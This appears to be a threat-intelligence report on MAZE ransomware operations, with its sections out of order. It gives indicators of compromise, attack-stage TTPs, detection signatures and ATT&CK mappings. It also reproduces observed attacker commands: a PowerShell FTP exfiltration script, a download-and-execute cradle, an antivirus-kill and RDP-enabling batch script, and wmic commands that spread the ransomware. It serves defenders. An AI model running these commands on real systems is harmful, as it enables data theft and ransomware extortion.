              if errorlevel 1 goto down
              echo %1
              START cmd /c "copy [Location of MAZE binary] \\%1\c$\windows\temp && exit"
              timeout 1 > NUL
              echo %1 >> done.txt
              rem wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" >> done.txt
              START "" cmd /c "wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" && exit"
              goto end
              :down
                rem Report machine down
                echo %1 >> offline.txt
              :end

              Example MAZE distribution script

              Indicators of Compromise

              Maze Payloads

              064058cf092063a5b69ed8fd2a1a04fe

              0f841c6332c89eaa7cac14c9d5b1d35b

              108a298b4ed5b4e77541061f32e55751

              11308e450b1f17954f531122a56fae3b

              15d7dd126391b0e7963c562a6cf3992c

              21a563f958b73d453ad91e251b11855c

              27c5ecbb94b84c315d56673a851b6cf9

              2f78ff32cbb3c478865a88276248d419

              335aba8d135cc2e66549080ec9e8c8b7

              3bfcba2dd05e1c75f86c008f4d245f62

              46b98ee908d08f15137e509e5e69db1b

              5774f35d180c0702741a46d98190ff37

              5df79164b6d0661277f11691121b1d53

              658e9deec68cf5d33ee0779f54806cc2

              65cf08ffaf12e47de8cd37098aac5b33

              79d137d91be9819930eeb3876e4fbe79

              8045b3d2d4a6084f14618b028710ce85

              8205a1106ae91d0b0705992d61e84ab2

              83b8d994b989f6cbeea3e1a5d68ca5d8

              868d604146e7e5cb5995934b085846e3

              87239ce48fc8196a5ab66d8562f48f26

              89e1ddb8cc86c710ee068d6c6bf300f4

              910aa49813ee4cc7e4fa0074db5e454a

              9eb13d56c363df67490bcc2149229e4c

              a0c5b4adbcd9eb6de9d32537b16c423b

              a3a3495ae2fc83479baeaf1878e1ea84

              b02be7a336dcc6635172e0d6ec24c554

              b40a9eda37493425782bda4a3d9dad58

              b4d6cb4e52bb525ebe43349076a240df

              b6786f141148925010122819047d1882

              b93616a1ea4f4a131cc0507e6c789f94

              bd9838d84fd77205011e8b0c2bd711e0

              be537a66d01c67076c8491b05866c894

              bf2e43ff8542e73c1b27291e0df06afd

              c3ce5e8075f506e396ee601f2757a2bd

              d2dda72ff2fbbb89bd871c5fc21ee96a

              d3eaab616883fcf51dcbdb4769dd86df

              d552be44a11d831e874e05cadafe04b6

              deebbea18401e8b5e83c410c6d3a8b4e

              dfa4631ec2b8459b1041168b1b1d5105

              e57ba11045a4b7bc30bd2d33498ef194

              e69a8eb94f65480980deaf1ff5a431a6

              ef95c48e750c1a3b1af8f5446fa04f54

              f04d404d84be66e64a584d425844b926

              f457bb5060543db3146291d8c9ad1001

              f5ecda7dd8bb1c514f93c09cea8ae00d

              f83cef2bf33a4d43e58b771e81af3ecc

              fba4cbb7167176990d5a8d24e9505f71

              Maze Check-in IPs

              91.218.114.11

              91.218.114.25

              91.218.114.26

              91.218.114.31

              91.218.114.32

              91.218.114.37

              91.218.114.38

              91.218.114.4

              91.218.114.77

              91.218.114.79

              92.63.11.151

              92.63.15.6 

              92.63.15.8 

              92.63.17.245

              92.63.194.20

              92.63.194.3

              92.63.29.137

              92.63.32.2 

              92.63.32.52

              92.63.32.55

              92.63.32.57

              92.63.37.100

              92.63.8.47

              Maze-related Domains

              aoacugmutagkwctu[.]onion

              mazedecrypt[.]top 

              mazenews[.]top

              newsmaze[.]top

              Maze Download URLs

              http://104.168.174.32/wordupd_3.0.1.tmp

              http://104.168.198.208/wordupd.tmp

              http://104.168.201.35/dospizdos.tmp

              http://104.168.201.47/wordupd.tmp

              http://104.168.215.54/wordupd.tmp

              http://149.56.245.196/wordupd.tmp

              http://192.119.106.235/mswordupd.tmp

              http://192.119.106.235/officeupd.tmp

              http://192.99.172.143/winupd.tmp

              http://54.39.233.188/win163.65.tmp

              http://91.208.184.174:8079/windef.exe

              http://agenziainformazioni[.]icu/wordupd.tmp

              http://www.download-invoice[.]site/Invoice_29557473.exe

              Malicious Documents

              1a26c9b6ba40e4e3c3dce12de266ae10

              53d5bdc6bd7904b44078cf80e239d42b

              79271dc08052480a578d583a298951c5

              a2d631fcb08a6c840c23a8f46f6892dd

              ad30987a53b1b0264d806805ce1a2561

              c09af442e8c808c953f4fa461956a30f

              ee26e33725b14850b1776a67bd8f2d0a

              BEACON C2s

              173.209.43.61

              193.36.237.173

              37.1.213.9

              37.252.7.142

              5.199.167.188

              checksoffice[.]me

              drivers.updatecenter[.]icu

              plaintsotherest[.]net

              thesawmeinrew[.]net

              updates.updatecenter[.]icu

              Cobalt Strike Binaries

              7507fe19afbda652e9b2768c10ad639f

              a93b86b2530cc988f801462ead702d84

              4f57e35a89e257952c3809211bef78ea

              bad6fc87a98d1663be0df23aedaf1c62

              f5ef96251f183f7fc63205d8ebf30cbf

              c818cc38f46c604f8576118f12fd0a63

              078cf6db38725c37030c79ef73519c0c

              c255daaa8abfadc12c9ae8ae2d148b31

              1fef99f05bf5ae78a28d521612506057

              cebe4799b6aff9cead533536b09fecd1

              4ccca6ff9b667a01df55326fcc850219

              bad6fc87a98d1663be0df23aedaf1c62

              Meterpreter C2s

              5.199.167.188

              Other Related Files

              3A5A9D40D4592C344920DD082029B362 (related script)

              76f8f28bd51efa03ab992fdb050c8382 (MAZE execution artifact)

              b5aa49c1bf4179452a85862ade3ef317 (windows.bat kill script) 

              fad3c6914d798e29a3fd8e415f1608f4 (related script)

              Tools & Utilities

              27304b246c7d5b4e149124d5f93c5b01 (PsExec)

              42badc1d2f03a8b1e4875740d3d49336 (7zip)

              75b55bb34dac9d02740b9ad6b6820360 (PsExec)

              9b02dd2a1a15e94922be3f85129083ac (AdFind)

              c621a9f931e4ebf37dace74efcce11f2 (SMBTools)

              f413b4a2242bb60829c9a470eea4dfb6 (winRAR) 

              Email Sender Domains

              att-customer[.]com

              att-information[.]com

              att-newsroom[.]com

              att-plans[.]com

              bezahlen-1und1[.]icu

              bzst-info[.]icu

              bzst-inform[.]icu

              bzstinfo[.]icu

              bzstinform[.]icu

              canada-post[.]icu

              canadapost-delivery[.]icu

              canadapost-tracking[.]icu

              hilfe-center-1und1[.]icu

              hilfe-center-internetag[.]icu

              trackweb-canadapost[.]icu

              Sender Domain Registrant Addresses

              abusereceive@hitler.rocks

              gladkoff1991@yandex.ru

              Mandiant Threat Intelligence will host an exclusive webinar on Thursday, May 21, 2020, at 8 a.m. PT / 11 a.m. ET to provide updated insight and information into the MAZE ransomware threat, and to answer questions from attendees. Register today to reserve your spot.

              Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents

              Targeted ransomware incidents have brought a threat of disruptive and destructive attacks to organizations across industries and geographies. FireEye Mandiant Threat Intelligence has previously documented this threat in our investigations of trends across ransomware incidents, FIN6 activity, implications for OT networks, and other aspects of post-compromise ransomware deployment. Since November 2019, we’ve seen the MAZE ransomware being used in attacks that combine targeted ransomware use, public exposure of victim data, and an affiliate model.

              Malicious actors have been actively deploying MAZE ransomware since at least May 2019. The ransomware was initially distributed via spam emails and exploit kits before later shifting to being deployed post-compromise. Multiple actors are involved in MAZE ransomware operations, based on our observations of alleged users in underground forums and distinct tactics, techniques, and procedures across Mandiant incident response engagements. Actors behind MAZE also maintain a public-facing website where they post data stolen from victims who refuse to pay an extortion fee.

              The combination of these two damaging intrusion outcomes—dumping sensitive data and disrupting enterprise networks—with a criminal service makes MAZE a notable threat to many organizations. This blog post is based on information derived from numerous Mandiant incident response engagements and our own research into the MAZE ecosystem and operations.

              Mandiant Threat Intelligence will be available to answer questions on the MAZE ransomware threat in a May 21 webinar.

              Victimology

              We are aware of more than 100 alleged MAZE victims reported by various media outlets and on the MAZE website since November 2019. These organizations have been primarily based in North America, although victims spanned nearly every geographical region. Nearly every industry sector including manufacturing, legal, financial services, construction, healthcare, technology, retail, and government has been impacted demonstrating that indiscriminate nature of these operations (Figure 1).


              Figure 1: Geographical and industry distribution of alleged MAZE victims

              Multiple Actors Involved in MAZE Ransomware Operations Identified

              Mandiant identified multiple Russian-speaking actors who claimed to use MAZE ransomware and were seeking partners to fulfill different functional roles within their teams. Additional information on these actors is available to Mandiant Intelligence subscribers. A panel used to manage victims targeted for MAZE ransomware deployment has a section for affiliate transactions. This activity is consistent with our assessment that MAZE operates under an affiliate model and is not distributed by a single group. Under this business model, ransomware developers will partner with other actors (i.e. affiliates) who are responsible for distributing the malware. In these scenarios, when a victim pays the ransom demand, the ransomware developers receive a commission. Direct affiliates of MAZE ransomware also partner with other actors who perform specific tasks for a percentage of the ransom payment. This includes partners who provide initial access to organizations and pentesters who are responsible for reconnaissance, privilege escalation and lateral movement—each of which who appear to work on a percentage-basis. Notably, in some cases, actors may be hired on a salary basis (vs commission) to perform specific tasks such as determining the victim organization and its annual revenues. This allows for specialization within the cyber criminal ecosystem, ultimately increasing efficiency, while still allowing all parties involved to profit.


              Figure 2: MAZE ransomware panel

              MAZE Initially Distributed via Exploit Kits and Spam Campaigns

              MAZE ransomware was initially distributed directly via exploit kits and spam campaigns through late 2019. For example, in November 2019, Mandiant observed multiple email campaigns delivering Maze ransomware primarily to individuals at organizations in Germany and the United States, although a significant number of emails were also delivered to entities in Canada, Italy, and South Korea. These emails used tax, invoice, and package delivery themes with document attachments or inline links to documents which download and execute Maze ransomware.

              On November 6 and 7, a Maze campaign targeting Germany delivered macro-laden documents using the subject lines “Wichtige informationen uber Steuerruckerstattung” and “1&1 Internet AG - Ihre Rechnung 19340003422 vom 07.11.19” (Figure 3). Recipients included individuals at organizations in a wide range of industries, with the Financial Services, Healthcare, and Manufacturing sectors being targeted most frequently. These emails were sent using a number of malicious domains created with the registrant address gladkoff1991@yandex.ru.


              Figure 3: German-language lure

              On November 8, a campaign delivered Maze primarily to Financial Services and Insurance organizations located in the United states. These emails originated from a compromised or spoofed account and contained an inline link to download a Maze executable payload.

              On November 18 and 19, a Maze campaign targeted individuals operating in a range of industries in the United States and Canada with macro documents using phone bill and package delivery themes (Figure 4 and Figure 5). These emails used the subjects “Missed package delivery” and "Your AT&T wireless bill is ready to view" and were sent using a number of malicious domains with the registrant address abusereceive@hitler.rocks. Notably, this registrant address was also used to create multiple Italian-language domains towards the end of November 2019.


              Figure 4: AT&T email lure


              Figure 5: Canada Post email lure

              Shift to Post-Compromise Distribution Maximizes Impact

              Actors using MAZE have increasingly shifted to deploying the ransomware post-compromise. This methodology provides an opportunity to infect more hosts within a victim’s environment and exfiltrate data, which is leveraged to apply additional pressure on organizations to pay extortion fees. Notably, in at least some cases, the actors behind these operations charge an additional fee, in addition to the decryption key, for the non-release of stolen data.

              Although the high-level intrusion scenarios preceding the distribution of MAZE ransomware are broadly similar, there have been notable variations across intrusions that suggest attribution to distinct teams. Even within these teams, the cyber criminals appear to be task-oriented meaning that one operator is not responsible for the full lifecycle. The following sections highlight the TTPs seen in a subset of incidents and serve to illustrate the divergence that may occur due to the fact that numerous, disparate actors are involved in different phases of these operations. Notably, the time between initial compromise to encryption has also been widely varied, from weeks to many months.

              Initial Compromise

              There are few clear patterns for intrusion vector across analyzed MAZE ransomware incidents. This is consistent with our observations of multiple actors who use MAZE soliciting partners with network access. The following are a sample of observations from several Mandiant incident response engagements:

              • A user downloaded a malicious resume-themed Microsoft Word document that contained macros which launched an IcedID payload, which was ultimately used to execute an instance of BEACON.
              • An actor logged into an internet-facing system via RDP. The account used to grant initial access was a generic support account. It is unclear how the actor obtained the account's password.
              • An actor exploited a misconfiguration on an Internet-facing system. This access enabled the actor to deploy tools to pivot into the internal network.
              • An actor logged into a Citrix web portal account with a weak password. This authenticated access enabled the actor to launch a Meterpreter payload on an internal system.

              Establish Foothold & Maintain Presence

              The use of legitimate credentials and broad distribution of BEACON across victim environments appear to be consistent approaches used by actors to establish their foothold in victim networks and to maintain presence as they look to meet their ultimate objective of deploying MAZE ransomware. Despite these commonplace behaviors, we have observed an actor create their own domain account to enable latter-stage operations.

              • Across multiple incidents, threat actors deploying MAZE established a foothold in victim environments by installing BEACON payloads on many servers and workstations.
              • Web shells were deployed to an internet-facing system. The system level access granted by these web shells was used to enable initial privilege escalation and the execution of a backdoor.
              • Intrusion operators regularly obtained and maintained access to multiple domain and local system accounts with varying permissions that were used throughout their operations.
              • An actor created a new domain account and added it to the domain administrators group.

              Escalate Privileges

              Although Mandiant has observed multiple cases where MAZE intrusion operators employed Mimikatz to collect credentials to enable privilege escalation, these efforts have also been bolstered in multiple cases via use of Bloodhound, and more manual searches for files containing credentials.

              • Less than two weeks after initial access, the actor downloaded and interacted with an archive named mimi.zip, which contained files corresponding to the credential harvesting tool Mimikatz. In the following days the same mimi.zip archive was identified on two domain controllers in the impacted environment.
              • The actor attempted to find files with the word “password” within the environment. Additionally, several archive files were also created with file names suggestive of credential harvesting activity.
              • The actor attempted to identify hosts running the KeePass password safe software.
              • Across multiple incidents, the Bloodhound utility was used, presumably to assess possible methods of obtaining credentials with domain administrator privileges.
              • Actors primarily used Procdump and Mimikatz to collect credentials used to enable later stages of their intrusion. Notably, both Bloodhound and PingCastle were also used, presumably to enable attackers' efforts to understand the impacted organization's Active Directory configuration. In this case the responsible actors also attempted to exfiltrate collected credentials to multiple different cloud file storage services.

              Reconnaissance

              Mandiant has observed a broad range of approaches to network, host, data, and Active Directory reconnaissance across observed MAZE incidents. The varied tools and approaches across these incidents maybe best highlights the divergent ways in which the responsible actors interact with victim networks.

              • In some intrusions, reconnaissance activity occurred within three days of gaining initial access to the victim network. The responsible actor executed a large number of reconnaissance scripts via Cobalt Strike to collect network, host, filesystem, and domain related information.
              • Multiple built-in Windows commands were used to enable network, account, and host reconnaissance of the impacted environment, though the actors also supplied and used Advanced IP Scanner and Adfind to support this stage of their operations.
              • Preliminary network reconnaissance has been conducted using a batch script named '2.bat' which contained a series of nslookup commands. The output of this script was copied into a file named '2.txt'.
              • The actor exfiltrated reconnaissance command output data and documents related to the IT environment to an attacker-controlled FTP server via an encoded PowerShell script.
              • Over a period of several days, an actor conducted reconnaissance activity using Bloodhound, PowerSploit/PowerView (Invoke-ShareFinder), and a reconnaissance script designed to enumerate directories across internal hosts.
              • An actor employed the adfind tool and a batch script to collect information about their network, hosts, domain, and users. The output from this batch script (2adfind.bat) was saved into an archive named 'ad.7z' using an instance of the 7zip archiving utility named 7.exe.
              • An actor used the tool smbtools.exe to assess whether accounts could login to systems across the environment.
              • An actor collected directory listings from file servers across an impacted environment. Evidence of data exfiltration was observed approximately one month later, suggesting that the creation of these directory listings may have been precursor activity, providing the actors with data they may have used to identify sensitive data for future exfiltration.

              Lateral Movement

              Across the majority of MAZE ransomware incidents lateral movement was accomplished via Cobalt Strike BEACON and using previously harvested credentials. Despite this uniformity, some alternative tools and approaches were also observed.

              • Attackers relied heavily on Cobalt Strike BEACON to move laterally across the impacted environment, though they also tunneled RDP using the ngrok utility, and employed tscon to hijack legitimate rdp sessions to enable both lateral movement and privilege escalation.
              • The actor moved laterally throughout some networks leveraging compromised service and user accounts obtained from the system on which they gained their initial foothold. This allowed them to obtain immediate access to additional systems. Stolen credentials were then used to move laterally across the network via RDP and to install BEACON payloads providing the actors with access to nearly one hundred hosts.
              • An actor moved laterally using Metasploit and later deployed a Cobalt Strike payload to a system using a local administrator account.
              • At least one actor attempted to perform lateral movement using EternalBlue in early and late 2019; however, there is no evidence that these attempts were successful.

              Complete Mission

              There was evidence suggesting data exfiltration across most analyzed MAZE ransomware incidents. While malicious actors could monetize stolen data in various way (e.g. sale in an underground forum, fraud), actors employing MAZE are known to threaten the release of stolen data if victim organizations do not pay an extortion fee.

              • An actor has been observed exfiltrating data to FTP servers using a base64-encoded PowerShell script designed to upload any files with .7z file extensions to a predefined FTP server using a hard-coded username and password. This script appears to be a slight variant of a script first posted to Microsoft TechNet in 2013.
              • A different base64-encoded PowerShell command was also used to enable this functionality in a separate incident.
              • Actors deploying MAZE ransomware have also used the utility WinSCP to exfiltrate data to an attacker-controlled FTP server.
              • An actor has been observed employing a file replication utility and copying the stolen data to a cloud file hosting/sharing service.
              • Prior to deploying MAZE ransomware threat actors employed the 7zip utility to archive data from across various corporate file shares. These archives were then exfiltrated to an attacker-controlled server via FTP using the WinSCP utility.

              In addition to data theft, actors deploy MAZE ransomware to encrypt files identified on the victim network. Notably, the aforementioned MAZE panel has an option to specify the date on which ransom demands will double, likely to create a sense of urgency to their demands.

              • Five days after data was exfiltrated from a victim environment the actor copied a MAZE ransomware binary to 15 hosts within the victim environment and successfully executed it on a portion of these systems.
              • Attackers employed batch scripts and a series to txt files containing host names to distribute and execute MAZE ransomware on many servers and workstations across the victim environment.
              • An actor deployed MAZE ransomware to tens of hosts, explicitly logging into each system using a domain administrator account created earlier in the intrusion.
              • Immediately following the exfiltration of sensitive data, the actors began deployment of MAZE ransomware to hosts across the network. In some cases, thousands of hosts were ultimately encrypted. The encryption process proceeded as follows:
                • A batch script named start.bat was used to execute a series of secondary batch scripts with names such as xaa3x.bat or xab3x.bat.
                • Each of these batch scripts contained a series of commands that employed the copy command, WMIC, and PsExec to copy and execute a kill script (windows.bat) and an instance of MAZE ransomware (sss.exe) on hosts across the impacted environment
                • Notably, forensic analysis of the impacted environment revealed MAZE deployment scripts targeting ten times as many hosts as were ultimately encrypted.

              Implications

              Based on our belief that the MAZE ransomware is distributed by multiple actors, we anticipate that the TTPs used throughout incidents associated with this ransomware will continue to vary somewhat, particularly in terms of the initial intrusion vector. For more comprehensive recommendations for addressing ransomware, please refer to our Ransomware Protection and Containment Strategies blog post and the linked white paper.

              Mandiant Security Validation Actions

              Organizations can validate their security controls against more than 20 MAZE-specific actions with Mandiant Security Validation. Please see our Headline Release Content Updates – April 21, 2020 on the Mandiant Security Validation Customer Portal for more information.

              • A100-877 - Active Directory - BloodHound, CollectionMethod All
              • A150-006 - Command and Control - BEACON, Check-in
              • A101-030 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #1
              • A101-031 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #2
              • A101-032 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #3
              • A100-878 - Command and Control - MAZE Ransomware, C2 Check-in
              • A100-887 - Command and Control - MAZE, DNS Query #1
              • A100-888 - Command and Control - MAZE, DNS Query #2
              • A100-889 - Command and Control - MAZE, DNS Query #3
              • A100-890 -  Command and Control - MAZE, DNS Query #4
              • A100-891 - Command and Control - MAZE, DNS Query #5
              • A100-509 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Github PoC
              • A100-339 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Landing Page
              • A101-033 - Exploit Kit Activity - Spelevo Exploit Kit, MAZE C2
              • A100-208 - FTP-based Exfil/Upload of PII Data (Various Compression)
              • A104-488 - Host CLI - Collection, Exfiltration: Active Directory Reconnaissance with SharpHound, CollectionMethod All
              • A104-046 - Host CLI - Collection, Exfiltration: Data from Local Drive using PowerShell
              • A104-090 - Host CLI - Collection, Impact: Creation of a Volume Shadow Copy
              • A104-489 - Host CLI - Collection: Privilege Escalation Check with PowerUp, Invoke-AllChecks
              • A104-037 - Host CLI - Credential Access, Discovery: File & Directory Discovery
              • A104-052 - Host CLI - Credential Access: Mimikatz
              • A104-167 - Host CLI - Credential Access: Mimikatz (2.1.1)
              • A104-490 - Host CLI - Defense Evasion, Discovery: Terminate Processes, Malware Analysis Tools
              • A104-491 - Host CLI - Defense Evasion, Persistence: MAZE, Create Target.lnk
              • A104-500 - Host CLI - Discovery, Defense Evasion: Debugger Detection
              • A104-492 - Host CLI - Discovery, Execution: Antivirus Query with WMI, PowerShell
              • A104-374 - Host CLI - Discovery: Enumerate Active Directory Forests
              • A104-493 - Host CLI - Discovery: Enumerate Network Shares
              • A104-481 - Host CLI - Discovery: Language Query Using PowerShell, Current User
              • A104-482 - Host CLI - Discovery: Language Query Using reg query
              • A104-494 - Host CLI - Discovery: MAZE, Dropping Ransomware Note Burn Directory
              • A104-495 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.html Variant
              • A104-496 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.txt Variant
              • A104-027 - Host CLI - Discovery: Process Discovery
              • A104-028 - Host CLI - Discovery: Process Discovery with PowerShell
              • A104-029 - Host CLI - Discovery: Remote System Discovery
              • A104-153 - Host CLI - Discovery: Security Software Identification with Tasklist
              • A104-083 - Host CLI - Discovery: System Info
              • A104-483 - Host CLI - Exfiltration: PowerShell FTP Upload
              • A104-498 - Host CLI - Impact: MAZE, Desktop Wallpaper Ransomware Message
              • A104-227 - Host CLI - Initial Access, Lateral Movement: Replication Through Removable Media
              • A100-879 - Malicious File Transfer - Adfind.exe, Download
              • A150-046 - Malicious File Transfer - BEACON, Download
              • A100-880 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp Executable Variant
              • A100-881 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp PowerShell Variant
              • A100-882 - Malicious File Transfer - Bloodhound Ingestor Download, PowerShell Variant
              • A101-037 - Malicious File Transfer - MAZE Download, Variant #1
              • A101-038 - Malicious File Transfer - MAZE Download, Variant #2
              • A101-039 - Malicious File Transfer - MAZE Download, Variant #3
              • A101-040 - Malicious File Transfer - MAZE Download, Variant #4
              • A101-041 - Malicious File Transfer - MAZE Download, Variant #5
              • A101-042 - Malicious File Transfer - MAZE Download, Variant #6
              • A101-043 - Malicious File Transfer - MAZE Download, Variant #7
              • A101-044 - Malicious File Transfer - MAZE Download, Variant #8
              • A101-045 - Malicious File Transfer - MAZE Download, Variant #9
              • A101-034 - Malicious File Transfer - MAZE Dropper Download, Variant #1
              • A101-035 - Malicious File Transfer - MAZE Dropper Download, Variant #2
              • A100-885 - Malicious File Transfer - MAZE Dropper Download, Variant #4
              • A101-036 - Malicious File Transfer - MAZE Ransomware, Malicious Macro, PowerShell Script Download
              • A100-284 - Malicious File Transfer - Mimikatz W/ Padding (1MB), Download
              • A100-886 - Malicious File Transfer - Rclone.exe, Download
              • A100-484 - Scanning Activity - Nmap smb-enum-shares, SMB Share Enumeration

              Detecting the Techniques

              Platform

              Signature Name

              MVX (covers multiple FireEye technologies)

              Bale Detection

              FE_Ransomware_Win_MAZE_1

              Endpoint Security

              WMIC SHADOWCOPY DELETE (METHODOLOGY)

              MAZE RANSOMWARE (FAMILY)

              Network Security

              Ransomware.Win.MAZE

              Ransomware.Maze

              Ransomware.Maze

              MITRE ATT&CK Mappings

              Mandiant currently tracks three separate clusters of activity involved in the post-compromise distribution of MAZE ransomware. Future data collection and analysis efforts may reveal additional groups involved in intrusion activity supporting MAZE operations, or may instead allow us to collapse some of these groups into larger clusters. It should also be noted that ‘initial access’ phase techniques have been included in these mappings, though in some cases this access may have been provided by a separate threat actor(s).

              MAZE Group 1 MITRE ATT&CK Mapping

              ATT&CK Tactic Category

              Techniques

              Initial Access

              T1133: External Remote Services

              T1078: Valid Accounts

              Execution

              T1059: Command-Line Interface

              T1086: PowerShell

              T1064: Scripting

              T1035: Service Execution

              Persistence

              T1078: Valid Accounts

              T1050: New Service

              Privilege Escalation

              T1078: Valid Accounts

              Defense Evasion

              T1078: Valid Accounts

              T1036: Masquerading

              T1027: Obfuscated Files or Information

              T1064: Scripting

              Credential Access

              T1110: Brute Force

              T1003: Credential Dumping

              Discovery

              T1087: Account Discovery

              T1482: Domain Trust Discovery

              T1083: File and Directory Discovery

              T1135: Network Share Discovery

              T1069: Permission Groups Discovery

              T1018: Remote System Discovery

              T1016: System Network Configuration Discovery

              Lateral Movement

              T1076: Remote Desktop Protocol

              T1105: Remote File Copy

              Collection

              T1005: Data from Local System

              Command and Control

              T1043: Commonly Used Port

              T1105: Remote File Copy

              T1071: Standard Application Layer Protocol

              Exfiltration

              T1002: Data Compressed

              T1048: Exfiltration Over Alternative Protocol

              Impact

              T1486: Data Encrypted for Impact

              T1489: Service Stop

              MAZE Group 2 MITRE ATT&CK Mapping

              ATT&CK Tactic Category

              Techniques

              Initial Access

              T1193: Spearphishing Attachment

              Execution

              T1059: Command-Line Interface

              T1086: PowerShell

              T1085: Rundll32

              T1064: Scripting

              T1204: User Execution

              T1028: Windows Remote Management

              Persistence

              T1078: Valid Accounts

              T1050: New Service

              T1136: Create Account

              Privilege Escalation

              T1078: Valid Accounts

              T1050: New Service

              Defense Evasion

              T1078: Valid Accounts

              T1140: Deobfuscate/Decode Files or Information

              T1107: File Deletion

              T1036: Masquerading

              Credential Access

              T1003: Credential Dumping

              T1081: Credentials in Files

              T1171: LLMNR/NBT-NS Poisoning

              Discovery

              T1087: Account Discovery

              T1482: Domain Trust Discovery

              T1083: File and Directory Discovery

              T1135: Network Share Discovery

              T1069: Permission Groups Discovery

              T1018: Remote System Discovery

              T1033: System Owner/User Discovery

              Lateral Movement

              T1076: Remote Desktop Protocol

              T1028: Windows Remote Management

              Collection

              T1074: Data Staged

              T1005: Data from Local System

              T1039: Data from Network Shared Drive

              Command and Control

              T1043: Commonly Used Port

              T1219: Remote Access Tools

              T1105: Remote File Copy

              T1071: Standard Application Layer Protocol

              T1032: Standard Cryptographic Protocol

              Exfiltration

              T1020: Automated Exfiltration

              T1002: Data Compressed

              T1048: Exfiltration Over Alternative Protocol

              Impact

              T1486: Data Encrypted for Impact

              MAZE Group 3 MITRE ATT&CK Mapping (FIN6)

              ATT&CK Tactic Category

              Techniques

              Initial Access

              T1133: External Remote Services

              T1078: Valid Accounts

              Execution

              T1059: Command-Line Interface

              T1086: PowerShell

              T1064: Scripting

              T1035: Service Execution

              Persistence

              T1078: Valid Accounts

              T1031: Modify Existing Service

              Privilege Escalation

              T1055: Process Injection

              T1078: Valid Accounts

              Defense Evasion

              T1055: Process Injection

              T1078: Valid Accounts

              T1116: Code Signing

              T1089: Disabling Security Tools

              T1202: Indirect Command Execution

              T1112: Modify Registry

              T1027: Obfuscated Files or Information

              T1108: Redundant Access

              T1064: Scripting

              Credential Access

              T1003: Credential Dumping

              Discovery

              T1087: Account Discovery

              T1482: Domain Trust Discovery

              T1083: File and Directory Discovery

              T1069: Permission Groups Discovery

              T1018: Remote System Discovery

              Lateral Movement

              T1097: Pass the Ticket

              T1076: Remote Desktop Protocol

              T1105: Remote File Copy

              T1077: Windows Admin Shares

              Collection

              T1074: Data Staged

              T1039: Data from Network Shared Drive

              Command and Control

              T1043: Commonly Used Port

              T1219: Remote Access Tools

              T1105: Remote File Copy

              T1071: Standard Application Layer Protocol

              T1032: Standard Cryptographic Protocol

              Exfiltration

              T1002: Data Compressed

              Impact

              T1486: Data Encrypted for Impact

              T1490: Inhibit System Recovery

              T1489: Service Stop

              Example Commands Observed in MAZE Ransomware Incidents

              function Enum-UsersFolders($PathEnum)
              {
                  $foldersArr = 'Desktop','Downloads','Documents','AppData/Roaming','AppData/Local'

                  Get-ChildItem -Path $PathEnum'/c$' -ErrorAction SilentlyContinue
                  Get-ChildItem -Path $PathEnum'/c$/Program Files' -ErrorAction SilentlyContinue
                  Get-ChildItem -Path $PathEnum'/c$/Program Files (x86)' -ErrorAction SilentlyContinue

                  foreach($Directory in Get-ChildItem -Path $PathEnum'/c$/Users' -ErrorAction SilentlyContinue) {

                      foreach($SeachDir in $foldersArr) {
                          Get-ChildItem -Path $PathEnum'/c$/Users/'$Directory'/'$SeachDir -ErrorAction SilentlyContinue
                      }
                  }
              }

              PowerShell reconnaissance script used to enumerate directories

              $Dir="C:/Windows/Temp/"
              #ftp server
              $ftp = "ftp://<IP Address>/incoming/"
              $user = "<username>"
              $pass = "<password>"
              $webclient = New-Object System.Net.WebClient
              $webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass)
              #list every sql server trace file
              foreach($item in (dir $Dir "*.7z")){
                 "Uploading $item..."
                 $uri = New-Object System.Uri($ftp+$item.Name)
                 $webclient.UploadFile($uri, $item.FullName)
              }

              Decoded FTP upload PowerShell script

              powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:43984/'); Add-FtpFile -ftpFilePath "ftp://<IP  Address>/cobalt_uploads/<file name>" -localFile "<local file path>\ <file name> " -userName "<username>" -password "<password>"

              Decoded FTP upload PowerShell script

              […]
              echo 7
              echo 7
              taskkill /im csrss_tc.exe /f
              taskkill /im kwsprod.exe /f
              taskkill /im avkwctl.exe /f
              taskkill /im rnav.exe /f
              taskkill /im crssvc.exe /f
              sc config CSAuth start= disabled
              taskkill /im vsserv.exe /f
              taskkill /im ppmcativedetection.exe /f
              […]
              taskkill /im sahookmain.exe /f
              taskkill /im mcinfo.exe /f
              reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
              netsh advfirewall firewall set rule group="remote desktop" new enable=Ye
              c:\windows\temp\sss.exe

              Excerpt from windows.bat kill script

              start copy sss.exe \\<internal IP>\c$\windows\temp\
              start copy sss.exe \\<internal IP>\c$\windows\temp\

              start copy windows.bat \\<internal IP>\c$\windows\temp\
              start copy windows.bat \\<internal IP>\c$\windows\temp\

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

